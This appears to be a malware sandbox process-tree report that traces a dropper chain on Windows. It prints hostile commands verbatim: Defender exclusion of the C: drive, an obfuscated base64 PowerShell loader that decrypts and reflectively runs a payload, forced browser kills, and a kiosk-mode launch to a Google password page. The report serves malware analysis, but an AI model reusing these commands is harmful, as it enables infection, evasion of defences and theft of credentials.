                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                                    PID:4852
                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                      cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                      7⤵
                                                                                                                                        PID:4400
                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                          8⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:3616
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        "C:\Windows\system32\svchost.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Downloads MZ/PE file
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:3132
                                                                                                                                        • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                          "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                          8⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:1900
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                          8⤵
                                                                                                                                          • Deletes itself
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:736
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{8b92ce0b-8c3d-4e35-a0ce-67b96b60bbf7}\2bf42a4e.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\{8b92ce0b-8c3d-4e35-a0ce-67b96b60bbf7}\2bf42a4e.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                                                                            9⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:9908
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{0e7cad1f-1ae1-4ad4-b933-8f77fc785b07}\072f5498.exe
                                                                                                                                              C:/Users/Admin/AppData/Local/Temp/{0e7cad1f-1ae1-4ad4-b933-8f77fc785b07}/\072f5498.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
                                                                                                                                              10⤵
                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                              • Sets service image path in registry
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Impair Defenses: Safe Mode Boot
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Adds Run key to start application
                                                                                                                                              • Enumerates connected drives
                                                                                                                                              • Writes to the Master Boot Record (MBR)
                                                                                                                                              • Checks for VirtualBox DLLs, possible anti-VM trick
                                                                                                                                              • Event Triggered Execution: Netsh Helper DLL
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious behavior: LoadsDriver
                                                                                                                                              PID:11200
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:3620
                                                                                                                                      • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                        7⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:5128
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10381600101\TbV75ZR.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10381600101\TbV75ZR.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:13116
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        PID:13140
                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 13140 -s 500
                                                                                                                                          8⤵
                                                                                                                                          • Program crash
                                                                                                                                          PID:13248
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10381610101\Rm3cVPI.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10381610101\Rm3cVPI.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4532
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10381621121\5YB5L4K.cmd"
                                                                                                                                      6⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:3148
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10381621121\5YB5L4K.cmd"
                                                                                                                                        7⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:2504
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                                                                          8⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Drops startup file
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          PID:1936
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                                                                            9⤵
                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:7724
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10381630101\kO2IdCz.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10381630101\kO2IdCz.exe"
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Adds Run key to start application
                                                                                                                                      PID:7608
                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                        cmd.exe /c 67e8f4de3ad1d.vbs
                                                                                                                                        7⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:7664
                                                                                                                                        • C:\Windows\System32\WScript.exe
                                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"
                                                                                                                                          8⤵
                                                                                                                                            PID:7908
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10381650101\6abfb05519.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10381650101\6abfb05519.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:8832
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10381660101\25bc2ed6b2.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10381660101\25bc2ed6b2.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:9324
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10381670101\fd739c033b.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10381670101\fd739c033b.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:12176
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10381680101\f02ada6e2f.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10381680101\f02ada6e2f.exe"
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                        PID:7164
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM firefox.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:3328
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM chrome.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:7492
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM msedge.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:7876
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM opera.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:8112
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill /F /IM brave.exe /T
                                                                                                                                          7⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:5116
                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                          7⤵
                                                                                                                                            PID:4804
                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                              8⤵
                                                                                                                                              • Checks processor information in registry
                                                                                                                                              • Modifies registry class
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:5612
                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {aa6d41f2-1e87-4a64-a693-236af7255798} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                9⤵
                                                                                                                                                  PID:8648
                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2488 -prefsLen 27135 -prefMapHandle 2492 -prefMapSize 270279 -ipcHandle 2500 -initialChannelId {656c803d-c756-41db-9363-67247ba7ae2f} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                  9⤵
                                                                                                                                                    PID:8768
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3912 -prefsLen 25164 -prefMapHandle 3916 -prefMapSize 270279 -jsInitHandle 3920 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3928 -initialChannelId {17b00589-747c-45b5-8bda-725b10a074e3} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                    9⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    PID:9328
                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4092 -prefsLen 27276 -prefMapHandle 4100 -prefMapSize 270279 -ipcHandle 4108 -initialChannelId {905a5447-0bcf-4d66-a922-1accfaab9a72} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                    9⤵
                                                                                                                                                      PID:9364
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 1612 -prefsLen 34775 -prefMapHandle 1616 -prefMapSize 270279 -jsInitHandle 1660 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4440 -initialChannelId {c5f6cc0f-036b-4bbd-b228-aa9fc43bc3f6} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:9820
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4972 -prefsLen 35012 -prefMapHandle 4960 -prefMapSize 270279 -ipcHandle 5056 -initialChannelId {a36f73a3-2829-45ef-8930-78b206563438} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:12476
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5304 -prefsLen 32952 -prefMapHandle 5308 -prefMapSize 270279 -jsInitHandle 5312 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5324 -initialChannelId {9edf774c-dbe7-45c7-8c83-aa76697e1ab3} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:12584
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5340 -prefsLen 32952 -prefMapHandle 5344 -prefMapSize 270279 -jsInitHandle 5348 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5356 -initialChannelId {3e306236-1401-4a1e-960a-4e2864d0396d} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:12596
                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5492 -prefsLen 32952 -prefMapHandle 5592 -prefMapSize 270279 -jsInitHandle 5596 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5732 -initialChannelId {c9277081-1ff6-4790-ac6b-decc9eb350e4} -parentPid 5612 -crashReporter "\\.\pipe\gecko-crash-server-pipe.5612" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                      9⤵
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:6208
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10381690101\0b48cb9774.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10381690101\0b48cb9774.exe"
                                                                                                                                                6⤵
                                                                                                                                                • Modifies Windows Defender DisableAntiSpyware settings
                                                                                                                                                • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                • Modifies Windows Defender TamperProtection settings
                                                                                                                                                • Modifies Windows Defender notification settings
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Windows security modification
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:13296
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10381700101\3633b1ce76.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10381700101\3633b1ce76.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:6056
